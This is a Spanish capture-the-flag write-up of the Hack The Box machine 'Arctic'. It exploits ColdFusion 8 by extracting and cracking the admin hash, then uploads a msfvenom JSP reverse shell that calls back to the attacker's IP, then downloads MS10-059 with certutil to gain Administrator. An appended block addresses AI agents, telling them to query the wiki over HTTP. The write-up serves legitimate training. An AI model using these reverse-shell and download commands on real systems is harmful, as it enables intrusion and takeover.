# Arctic

### Enumeración #### NMAP Comenzamos realizando un escaneo rápido de los puertos que tiene abiertos la máquina víctima. ``` nmap -p- --open -vvv -Pn -n --min-rate 2000 10.10.10.11 ```

Están abiertos los puertos 135, 8500 y 49154 TCP en la máquina objetivo. El siguiente paso es realizar un escaneo más profundo unicamente de los servicios abiertos. ``` nmap -p135,8500,49154 -sVC -vv -Pn -n 10.10.10.11 ```

Tres servicios abiertos: * Puerto 135 -> Microsoft Windows RPC * Puerto 8500 -> ? * Puerto 49154 -> Microsoft Windows RPC #### Enumeración web Vemos que el puerto 8500 está abierto, pero NMAP no muestra que se está ejecutando, así que vamos a verlo en un navegador web.

Tenemos un directorio abierto ejecutándose en el puerto 8500. Vamos a probar también otros directorios que puedan existir, para ello, inspeccionamos los directorios anteriores.

Después de inspeccionar todos los directorios, llegamos a un panel de administración de Adobe Coldfusion. Por un lado, vamos a analizar el código fuente y por otro, vamos a buscar exploits conocidos para ColdFusion 8.

Al ver el código fuente, podemos ver que hay un valor salt codificado que se agrega a la contraseña cuando se ingresa. Lo anotamos por si fuese interesante más adelante. Vamos a buscar exploits para esta versión. ``` searchploit coldfusion ```

Para descargar el exploit. ``` searchploit -m 14641.py ``` Abrimos el exploit.

Y encontramos lo que parece ser un contraseña cifrada. Password: `2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03` Vamos a descifrarla con hash-identifier y john-the-ripper. ``` hash-identifier john -w='/home/kali/rockyou.txt' --format=raw-sha1 hash_password ```

Obtenemos la contraseña "happyday" Vamos a acceder al panel de admnistrador como usuario Admin utilizando la password anterior.

El siguiente paso será buscar puntos vulnerables dentro de este panel de administrador. ### Shell como usuario Tolis Hay multitud de enlaces que debemos revisar. Después de realizar la inspección, él único enlace que nos sirve es el servicio "Scheduled Tasks" en la sección "Debugging & Logging", que ofrece ColdFusion y nos permite cargar archivos.

Crearé un shell inverso con extensión`jsp`usando msfvenom para cargarlo en la máquina objetivo. ¿Por qué? ColdFusion está basado en Java y ejecuta archivos jsp. ``` msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.11 LPORT=8500 > securiters.jsp ``` Esta shell creada la movemos al directorio /var/www/html/ para poder enviarla a la máquina objetivo mediante un servidor Web Apache. ``` cp securiters.jsp /var/www/html/ ``` Primero vamos a buscar la ruta del path /CFIDE. Será necesario para subir la subir al objetivo.

El siguiente paso, cargar la shell en el objetivo. Para ello, iniciamos un servidor web Apache. ``` service apache2 start ``` Ahora vamos a programar una tarea en ColdFusion para que acceda al archivo securiters.jsp en nuestro servidor y poder cargar la shell. Agregaremos la URL de nuestro servidor donde está alojado el archivo securiters.jsp y también la ruta de destino para guardar el archivo en el objetivo, es decir, `C:\ColdFusion8\wwwroot\CFIDE\securiters.jsp` Una vez programada la tarea, procedemos a ejecutarla.

Y volvemos al directorio /CFIDE, comprobando que se haya subido correctamente nuestra shell securiters.jsp.

Establecemos un oyente en nuestra máquina atacante. ``` nc -lvnp 8500 ```

Y ya tendriamos shell como usuario tolis. Vamos a por la flag user.txt

### Shell como usuario Administrator Tenemos la siguiente información acerca de la máquina víctima.

Guardamos la información de systeminfo en un archivo txt, nos será útil en la siguiente fase. Vamos a utilizar [Windows-Exploit-Suggester](https://github.com/Riqky/Windows-Exploit-Suggester) para buscar posibles vulnerabilidades en el sistema de la máquina víctima. Vamos a instalar este script en nuestra máquina atacante. ``` git clone https://github.com/Riqky/Windows-Exploit-Suggester.git cd Windows-Exploit-Suggester sudo pip install xlrd --upgrade ./windows-exploit-suggester.py --update ``` Y ahora, ejecutamos este script con la base de datos actualizada que se ha creado y el archivo systeminfo que comentabamos anteriormente. ``` ./windows-exploit-suggester.py --database 2022-11-03-mssb.xlsx --systeminfo '/home/kali/Desktop/HackTheBox/arctic/systeminfo.txt' ``` Una vez ejecutado el comando anterior, obtenemos las siguientes vulnerabilidades en la máquina víctima.

Vamos a utilizar la vulnerabilidad [MS10-059](https://github.com/SecWiki/windows-kernel-exploits/raw/master/MS10-059/MS10-059.exe) para intentar obtener acceso como administrador a la máquina víctima. Descargamos el exploit y lo subimos a la máquina víctima haciendo uso de un servidor Python HTTP. ``` python3 -m http.server 8080 certutil.exe -urlcache -f http://10.10.16.11:8080/MS10-059.exe c.exe (en la máquina víctima) ``` Ejecutamos el exploit en la máquina víctima, y al mismo tiempo colocamos un oyente en nuestra máquina. ``` rlwrap nc -lnvp 8000 c.exe 10.10.16.11 8000 (en la máquina víctima, en el directorio donde se haya colocado el exploit) ```

Una vez ejecutado el exploit, tendriamos privilegios máximos en la máquina objetivo. El siguiente psao será buscar la flag root para finalizar este CTF.

Y ya estaría acabado este CTF. {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://wiki.securiters.com/securiters-wiki/write-ups/hack-the-box/arctic.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.